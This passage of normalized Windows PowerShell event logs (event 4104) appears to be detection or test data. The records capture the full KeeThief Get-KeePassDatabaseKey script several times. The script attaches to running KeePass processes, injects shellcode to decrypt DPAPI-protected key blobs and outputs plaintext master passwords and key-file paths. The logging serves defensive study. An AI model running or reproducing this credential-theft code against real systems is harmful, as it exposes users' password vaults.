C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpPassword\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 48920376\\n EncryptedBlob : {228, 78, 75, 16...}\\n EncryptedBlobLen : 16\\n PlaintextBlob : {80, 97, 115, 115...}\\n Plaintext : Password123!\\n KeyFilePath :\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n ....\\n# >\\n [CmdletBinding()] \\n param (\\n [Parameter(Position = 0, ValueFromPipeline = $True)]\\n [System.Diagnostics.Process[]]\\n [ValidateNotNullOrEmpty()]\\n $Process\\n )\\n \\n BEGIN {\\n if(-not $PSBoundParameters['Process']) {\\n try {\\n $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\\\.'}\\n }\\n catch {\\n throw 'No KeePass 2.X instances open!'\\n }\\n }\\n\\n # load file off of disk instead\\n # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\\\ReleaseKeePass.exe).FullName)\\n\\n # the KeyTheft assembly, generated with \\\"Out-CompressedDll -FilePath .\\\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\\\compressed.ps1\\\"\\n\\n }\\n\\n PROCESS {\\n\\n ForEach($KeePassProcess in $Process) {\\n\\n if($KeePassProcess.FileVersion -match '^2\\\\.') {\\n\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath\\n\\n Write-Verbose \\\"Examining KeePass process $($KeePassProcess.ID) for master keys\\\"\\n\\n $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess))\\n\\n if($Keys) {\\n\\n ForEach ($Key in $Keys) 
{\\n\\n ForEach($UserKey in $Key.UserKeys) {\\n\\n $KeyType = $UserKey.GetType().Name\\n\\n $UserKeyObject = New-Object PSObject\\n $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation\\n $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType\\n $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion\\n $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID\\n $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen\\n $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob\\n\\n if($KeyType -eq 'KcpPassword') {\\n $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob)\\n }\\n else {\\n $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob)\\n }\\n\\n $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext\\n\\n if($KeyType -eq 'KcpUserAccount') {\\n try {\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $UserName = $WMIProcess.GetOwner().User\\n\\n $ProtectedUserKeyPath = Resolve-Path -Path \\\"$($Env:WinDir | Split-Path -Qualifier)\\\\Users\\\\*$UserName*\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\\n\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath\\n\\n }\\n catch {\\n Write-Warning \\\"Error enumerating the owner of $($KeePassProcess.ID) : $_\\\"\\n }\\n }\\n else {\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath\\n }\\n\\n $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys')\\n $UserKeyObject\\n }\\n }\\n }\\n else {\\n Write-Verbose \\\"No keys 
found for $($KeePassProcess.ID)\\\"\\n }\\n }\\n else {\\n Write-Warning \\\"Only KeePass 2.X is supported at this time.\\\"\\n }\\n }\\n }\\n}\\n\",\"Name\":\"ScriptBlockText\"},{\"text\":\"d4643a9b-6f64-4fbc-95e8-c2524689590f\",\"Name\":\"ScriptBlockId\"},{\"text\":\"C:\\\\Users\\\\Administrator\\\\Downloads\\\\KeeThief_test\\\\KeeThief-master\\\\KeeTheft\\\\KeeTheft\\\\KeeThief.ps1\",\"Name\":\"Path\"}]}}}", "category.generic": "Command", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-18", "object.fullpath": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\KeeThief.ps1", "object.id": "d4643a9b-6f64-4fbc-95e8-c2524689590f", "object.name": "KeeThief.ps1", "object.path": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\", "object.process.cmdline": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. 
Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... 
KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' 
} } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = 
$WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "object.process.id": "7064", "object.value": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. 
For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! 
KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 
'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T11:33:47.757Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-18", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:02.710Z", "type": "raw", "uuid": "3e774e05-1f1a-4b58-812a-3127158afc3a"}
-{"action": "execute", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-PowerShell\",\"Guid\":\"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\"},\"EventID\":\"4104\",\"Version\":\"1\",\"Level\":\"3\",\"Task\":\"2\",\"Opcode\":\"15\",\"Keywords\":\"0x0\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:02.7106082Z\"},\"EventRecordID\":\"273644\",\"Correlation\":{\"ActivityID\":\"{83cf053f-9302-0000-d6c4-7b840293d901}\"},\"Execution\":{\"ProcessID\":\"7064\",\"ThreadID\":\"5708\"},\"Channel\":\"Microsoft-Windows-PowerShell/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"1\",\"Name\":\"MessageNumber\"},{\"text\":\"1\",\"Name\":\"MessageTotal\"},{\"text\":\"# requires -version 2\\n\\nfunction Get-KeePassDatabaseKey {\\n<# \\n .SYNOPSIS\\n \\n Retrieves database mastey key information for unlocked KeePass database.\\n\\n Function: Get-KeePassDatabaseKey\\n Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y)\\n License: BSD 3-Clause\\n Required Dependencies: None\\n Optional Dependencies: None\\n\\n .DESCRIPTION\\n \\n Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline.\\n Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys()\\n method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate\\n all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted\\n from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey.\\n If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount)\\n is extracted, including the DPAPI encrypted data blobs of key data. 
For any encrypted blobs found, shellcode\\n is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs,\\n returning the plaintext/unprotected key data.\\n\\n .PARAMETER Process\\n\\n Optional KeePass process object to pass in on the pipeline.\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49045328\\n EncryptedBlob : {113, 148, 127, 29...}\\n EncryptedBlobLen : 64\\n PlaintextBlob : {120, 181, 162, 116...}\\n Plaintext : eLWidCSt...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpKeyFile\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49037240\\n EncryptedBlob : {137, 185, 6, 97...}\\n EncryptedBlobLen : 32\\n PlaintextBlob : {177, 5, 150, 205...}\\n Plaintext : sQWWzdcT...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Documents\\\\s.license\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpPassword\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 48920376\\n EncryptedBlob : {228, 78, 75, 16...}\\n EncryptedBlobLen : 16\\n PlaintextBlob : {80, 97, 115, 115...}\\n Plaintext : Password123!\\n KeyFilePath :\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-Process KeePass | 
Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n ....\\n# >\\n [CmdletBinding()] \\n param (\\n [Parameter(Position = 0, ValueFromPipeline = $True)]\\n [System.Diagnostics.Process[]]\\n [ValidateNotNullOrEmpty()]\\n $Process\\n )\\n \\n BEGIN {\\n if(-not $PSBoundParameters['Process']) {\\n try {\\n $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\\\.'}\\n }\\n catch {\\n throw 'No KeePass 2.X instances open!'\\n }\\n }\\n\\n # load file off of disk instead\\n # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\\\ReleaseKeePass.exe).FullName)\\n\\n # the KeyTheft assembly, generated with \\\"Out-CompressedDll -FilePath .\\\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\\\compressed.ps1\\\"\\n\\n }\\n\\n PROCESS {\\n\\n ForEach($KeePassProcess in $Process) {\\n\\n if($KeePassProcess.FileVersion -match '^2\\\\.') {\\n\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath\\n\\n Write-Verbose \\\"Examining KeePass process $($KeePassProcess.ID) for master keys\\\"\\n\\n $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess))\\n\\n if($Keys) {\\n\\n ForEach ($Key in $Keys) {\\n\\n ForEach($UserKey in $Key.UserKeys) {\\n\\n $KeyType = $UserKey.GetType().Name\\n\\n $UserKeyObject = New-Object PSObject\\n $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation\\n $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType\\n $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion\\n $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID\\n $UserKeyObject | Add-Member Noteproperty 
'ExecutablePath' $ExecutablePath\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen\\n $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob\\n\\n if($KeyType -eq 'KcpPassword') {\\n $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob)\\n }\\n else {\\n $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob)\\n }\\n\\n $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext\\n\\n if($KeyType -eq 'KcpUserAccount') {\\n try {\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $UserName = $WMIProcess.GetOwner().User\\n\\n $ProtectedUserKeyPath = Resolve-Path -Path \\\"$($Env:WinDir | Split-Path -Qualifier)\\\\Users\\\\*$UserName*\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\\n\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath\\n\\n }\\n catch {\\n Write-Warning \\\"Error enumerating the owner of $($KeePassProcess.ID) : $_\\\"\\n }\\n }\\n else {\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath\\n }\\n\\n $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys')\\n $UserKeyObject\\n }\\n }\\n }\\n else {\\n Write-Verbose \\\"No keys found for $($KeePassProcess.ID)\\\"\\n }\\n }\\n else {\\n Write-Warning \\\"Only KeePass 2.X is supported at this time.\\\"\\n }\\n }\\n }\\n}\\n\",\"Name\":\"ScriptBlockText\"},{\"text\":\"d4643a9b-6f64-4fbc-95e8-c2524689590f\",\"Name\":\"ScriptBlockId\"},{\"text\":\"C:\\\\Users\\\\Administrator\\\\Downloads\\\\KeeThief_test\\\\KeeThief-master\\\\KeeTheft\\\\KeeTheft\\\\KeeThief.ps1\",\"Name\":\"Path\"}]}}}", "category.generic": "Command", "category.high": "System 
Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-18", "object.fullpath": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\KeeThief.ps1", "object.id": "d4643a9b-6f64-4fbc-95e8-c2524689590f", "object.name": "KeeThief.ps1", "object.path": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\", "object.process.cmdline": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. 
